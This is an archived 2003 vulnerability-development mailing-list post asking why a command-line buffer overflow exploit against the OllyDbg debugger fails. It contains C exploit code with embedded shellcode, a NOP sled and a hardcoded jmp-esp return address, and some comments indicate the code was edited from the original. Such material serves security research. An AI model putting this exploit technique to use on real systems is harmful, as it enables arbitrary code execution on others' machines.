Vulnerability Development mailing list archives

win32 command line overflows: (ex: ollydbg.exe)


From: "wirepair" <wirepair () roguemail net>
Date: Thu, 05 Jun 2003 05:24:45 -0700

Hello all,

Just messing around with win32 overflows, and I've run into a small problem with command line overflows. Ollydbg has a buffer overflow when you call a program with a large command line. (I found this when trying to debug rasphone.exe in WinXP (rasphone -f <1000 a's>).) I was expecting Ollydbg to run the program but it crashed itself: "Error in Instruction 0x41414141 while trying to 'read' 0x41414141". So I tried to write an exploit for Ollydbg.

Issue #2: Visual C++ crashes as well when I'm trying to debug ollydbg, so I have to do this blindly. My exploit buffer looks like:

ollydbg.exe ollydbg.exe <200 NOPS>Shellcode<more nops>[&EIP]<nops>

I'm trying to use CreateProcess to call ollydbg.exe but it doesn't do anything, no crash, no nothing. So I saved the exploit buffer to a file and tried to 'paste' it (heh). It doesn't crash even though there are over 600 characters... (Ollydbg.exe overwrites EIP at 508-511, I think; I can't debug it!) Anyways, here's my code; any insight on why this isn't working is greatly appreciated:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>

int main(int argc, char **argv) {
        char exp_buff[1024];
        int x, i;
        char ollyfile[100];
        DWORD jmpesp = 0x77E9AE59; // jmp esp call in kernel32.dll (address as given in the post)
        unsigned char shellcode[19] = "\xC7\x45\xFD\x63\x6D\x64\x20\x8D\x45\xFD\x50\xB8\x35\xFD\xE6\x77\xFF\xD0"; //tiny sc
        PROCESS_INFORMATION pi;
        STARTUPINFO si;

        if (argc != 2) {
                fprintf(stderr, "heh: %s <path to olly>\n", argv[0]);
                exit(1);
        }
        /* ollyfile holds 100 bytes (indices 0..99); the original wrote to index 100, one past the end */
        strncpy(ollyfile, argv[1], 99);
        ollyfile[99] = 0x00;

        x = strlen(ollyfile);
        /* fill the whole buffer with NOPs, then place the program name and a space at the front */
        memset(exp_buff, 0x90, sizeof(exp_buff));
        memcpy(exp_buff, ollyfile, x);
        exp_buff[x] = ' ';
        /* shellcode at offset 200; byte 19 of the copy is the string terminator, so re-NOP it */
        memcpy(exp_buff + 200, shellcode, 19);
        exp_buff[218] = 0x90;
        for (i = 219; i <= 508; i++) {
                exp_buff[i] = 0x90;
        }
        /* return address at 508-511; terminate at index 1023 (index 1024 is past the end of exp_buff) */
        memcpy(exp_buff + 508, &jmpesp, 4);
        exp_buff[1023] = 0x00;
        fprintf(stderr, "%s", exp_buff); //debugging heh

        /* CreateProcess expects STARTUPINFO zeroed with cb set; the original left si uninitialized */
        ZeroMemory(&si, sizeof(si));
        si.cb = sizeof(si);
        ZeroMemory(&pi, sizeof(pi));

        if (!CreateProcess("E:\\ollydbg\\ollydbg.exe", exp_buff, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
                fprintf(stderr, "CreateProcess failed: %lu\n", GetLastError());
                return 1;
        }
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);

        return(0);
}

Thanks
-wire